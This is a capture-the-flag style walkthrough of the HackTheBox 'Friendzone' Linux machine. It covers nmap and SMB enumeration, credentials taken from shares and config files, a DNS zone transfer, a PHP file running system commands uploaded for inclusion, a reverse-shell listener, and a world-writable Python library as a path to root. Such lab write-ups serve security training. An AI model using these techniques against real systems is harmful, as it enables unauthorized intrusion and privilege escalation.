Friendzone is an easy-rated Linux machine from HackTheBox, created by Creator askar. In the current post, my IP is 10.10.14.24, and the target IP is 10.129.191.183.
Friendzone is like those easy boxes that are challenging. At the start, it has a lot of noise and rabbit holes, wasting your time. The good thing about this machine, is it's a mix of many techniques and stuff, checking SMB, doing an LFI, inject a php file, etc. It's a funny machine.
Gathering Information
The first steps are about getting basic information about the target, by using nmap and searching information from the website.
Local Terminal
$ ping -c 1 10.129.191.183
Pinging 10.129.191.183 with 32 bytes of data:
Reply from 10.129.191.183: bytes=32 time=176ms TTL=63
Reply from 10.129.191.183: bytes=32 time=188ms TTL=63
Reply from 10.129.191.183: bytes=32 time=233ms TTL=63
Reply from 10.129.191.183: bytes=32 time=168ms TTL=63
Ping statistics for 10.129.191.183:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 168ms, Maximum = 233ms, Average = 191ms
By the TTL, we can assume that is a Linux Machine.
Local Terminal
$nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.191.183 --oG Ports
Nmap scan report for 10.129.191.183
Host is up, received echo-reply ttl 63 (0.79s latency).
Scanned at 2023-05-24 09:42:09 Pacific SA Standard Time for 25s
Not shown: 39993 closed tcp ports (reset), 25535 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
53/tcp open domain syn-ack ttl 63
80/tcp open http syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
443/tcp open https syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 25.41 seconds
Raw packets sent: 106042 (4.666MB) | Rcvd: 42746 (1.710MB)
Local Terminal
$ nmap -sC -sV -p 21,22,53,80,139,443,445 10.129.191.183 -oN Target
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-24 09:44 Pacific SA Standard Time
Nmap scan report for 10.129.191.183
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Friend Zone Escape software
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-05-24T13:44:19
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2023-05-24T16:44:20+03:00
|_clock-skew: mean: -59m58s, deviation: 1h43m54s, median: 0s
It has the FTP port 21 service working, we are going to check if has the user anonymous
Local Terminal
$ ftp 10.129.191.183
Connected to 10.129.191.183.
220 (vsFTPd 3.0.3)
Name (10.129.191.183:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
It doesn't work, and the services https at the port 443, can provide information by using the command openSSL
Local Terminal
$ openssl s_client -connect 10.129.191.183:443
CONNECTED(00000003)
Cant use SSL_get_servername
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=18:self-signed certificate
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=10:certificate has expired
notAfter=Nov 4 21:02:30 2018 GMT
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
notAfter=Nov 4 21:02:30 2018 GMT
verify return:1
---
Certificate chain
0 s:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
i:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Oct 5 21:02:30 2018 GMT; NotAfter: Nov 4 21:02:30 2018 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
<...> # Innecesary information
-----END CERTIFICATE-----
subject=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
issuer=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1677 bytes and written 386 bytes
Verification error: certificate has expired
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: 9463F6CBBB0671B5500A84FB494E988FAB498146CC26C50C15A05DC344B6847D
Session-ID-ctx:
Master-Key: 673175AB9328562B2F24180E4CEE79BBDF47F65472CA8EB708499ACB0A26903A38524E095BFBD51339B4056350435CE3
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
<...> #Innecesary info
Start Time: 1684937022
Timeout : 7200 (sec)
Verify return code: 10 (certificate has expired)
Extended master secret: yes
---
There is an email (haha@friendzone.red) and a domain (CN = friendzone.red), to avoid public IPs, we need to add it to /etc/hosts
New email added {info@friendzoneportal.red} and thanks to it, another domain {friendzoneportal.red}, remember to add it in /etc/hosts. If you are using Windows, use vi C:\Windows\System32\drivers\etc\hosts
It changes always, uses base64, but if you decode that you will get nothing.
So, we got nothing, let's check the nmap information again and test with other channels.
Local Terminal
$ smbclient -L 10.129.191.183 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Local Terminal
$ smbmap -H 10.129.191.183
[+] Guest session IP: 10.129.191.183:445 Name: friendzone.red
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
The important information comes from the disk with permissions.
Local Terminal
$ smbclient //10.129.191.183/general -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 17:10:51 2019
.. D 0 Tue Sep 13 11:56:24 2022
creds.txt N 57 Tue Oct 9 20:52:42 2018
3545824 blocks of size 1024. 1651340 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Go where you downloaded the creds.txt files and read the document
Local Terminal
$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
Local Terminal
$ smbmap -H 10.129.191.183 -u 'admin' -p 'WORKWORKHhallelujah@#'
[+] Guest session IP: 10.129.191.183:445 Name: friendzone.red
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
Valid, but nothing change
Now, we are going to abuse to the service at the port 53, to make a Zone Transference Attack.
$ dig axfr friendzone.red @ns1.hostresolver.com.
# Some writeups says that this should work, but for some reason I want use axfr scan.
# You should find: https://administrator1.friendzone.red/
We can see that the website respond to the parameter timestamp, by adding a .php at the end. Thanks to SMB we find a folder called Development that we can read and write, this sounds weird but there is a chance that by creating a file and test something will happen.
Local Terminal
$ vi test.php
test.php
<?php
echo "Hello, this is a test";
system("whoami");
?>
Local Terminal
$ smbclient //10.129.191.183/Development -N
$ put test.php
$ exit
$ smbclient //10.129.191.183/Development -N
$ put reverse.php
$ exit
Local Terminal
$ rlwrap nc -nlvp 443
Now to work better, you need to do a Bash Upgrade.
Local Terminal
www-data@FriendZone:/var/www/admin$ ls
dashboard.php images index.html login.php timestamp.php
www-data@FriendZone:/var/www/admin$ cd ..
www-data@FriendZone:/var/www$ ls
admin friendzone friendzoneportal friendzoneportaladmin html mysql_data.conf uploads
Always, configuration files like "mysql_data.conf" are worth to check
Target Terminal [www-data]
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
Credentials in plain text!
Target Terminal [www-data]
www-data@FriendZone:/var/www$ su friend
Password: #Try: Agpyu12!0.213$
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
Target Terminal [Friend]
friend@FriendZone:/opt/server_admin$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
# Or you can try "find -type f -writable -ls" (From "0xdf hacks stuff")
As you can see, the package "os" is executed from python and by root and we have write permission.
